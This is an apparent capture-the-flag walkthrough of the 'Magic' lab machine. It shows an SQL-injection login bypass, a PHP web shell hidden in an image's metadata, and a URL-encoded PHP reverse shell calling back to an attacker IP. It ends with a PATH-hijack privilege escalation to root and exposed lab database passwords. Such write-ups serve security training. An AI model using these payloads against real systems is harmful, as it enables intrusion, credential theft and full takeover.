Enumeration:
root@docker-desktop:~/Documents/magic# scan 10.10.10.185
[*] OS based on TTL
38
Linux
[*] TCP Scan
Open ports: 80,22
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL:0
Port scan:132
Nmap:8
Total:140
There is a web listening so let’s have a look at it:
It seems like it has an image carousel and a login page.
Intrussion:
To bypass the login page used a basic sql injection:
Then got redirected to http://10.10.10.185/upload.php
, the objective right now is to get a reverse shell from uloading an image.
Firstly tried to upload a php file changing the Content-Type
header of the post request, but it seems to be checking the magic numbers together with a file whitelist.
So added a comment metadata section of an already existing image a php payload:
root@osboxes:~/Downloads# exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' payload.png
1 image files updated
root@osboxes:~/Downloads# mv payload.png payload.php.png
Tested the RCE to make sure it was working:
Listened on port 1234 using ncat rlwrap nc -lvp 1234
.
Then used a reverse shell as payload url encoded http://10.10.10.185/images/uploads/payload.php.png?cmd=%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%30%2e%31%30%2e%31%35%2e%32%34%35%22%2c%31%32%33%34%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27
After some manual enumeration found mysql creds:
|
|
Then looked which binaries use mysql:
www-data@ubuntu:/var/www/Magic$ ls /usr/bin | grep mysql
mysql_config_editor
mysql_embedded
mysql_install_db
mysql_plugin
mysql_secure_installation
mysql_ssl_rsa_setup
mysql_tzinfo_to_sql
mysql_upgrade
mysqladmin
mysqlanalyze
mysqlbinlog
mysqlcheck
mysqld_multi
mysqld_safe
mysqldump
mysqldumpslow
mysqlimport
mysqloptimize
mysqlpump
mysqlrepair
mysqlreport
mysqlshow
mysqlslap
Used mysqldump
to dump all the database:
www-data@ubuntu:/var/www/Magic$ mysqldump -u theseus -p --all-databases
Enter password: iamkingtheseus
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database:
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `Magic`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `Magic`;
--
-- Table structure for table `login`
--
DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-07-13 16:00:26
Then used the password to log as “theseus”.
Privesc:
Looked for SUID files:
theseus@ubuntu:/var/www/Magic$ find / -type f -perm /4000 2>/dev/null | grep -v snap
snap / -type f -perm /4000 2>/dev/null | grep -v s
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/tmp/exploit2
/tmp/exploit.c
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
Found that we can execute sysinfo
as root, used strings to check what the binary does:
theseus@ubuntu:~$ strings /bin/sysinfo
...
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
...
Apparently it is calling cat
with a relative path, so we can make path hijacking attack:
We add /tmp
to the PATH, then we copy bash to that directory. Finally we create a file called cat
that changes the file ownership to root and also gives it SUID permissions:
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ cp /bin/bash /tmp
theseus@ubuntu:/tmp$ echo "chown root /tmp/bash; chmod +s /tmp/bash" > cat
theseus@ubuntu:/tmp$ chmod +x cat
theseus@ubuntu:/tmp$ sysinfo > /dev/null 2>&1
theseus@ubuntu:/tmp$ ls -l /tmp/bash
-rwsr-sr-x 1 root theseus 1113504 Jul 14 03:46 /tmp/bash
theseus@ubuntu:/tmp$ ./bash -p
bash-4.4# id
uid=1000(theseus) gid=1000(theseus) euid=0(root) groups=1000(theseus),100(users)
Resources
- https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf
- https://book.hacktricks.xyz/pentesting-web/file-upload
- https://viblo.asia/p/leo-thang-dac-quyen-trong-linux-linux-privilege-escalation-2-using-path-variables-3P0lPq6o5ox
- https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/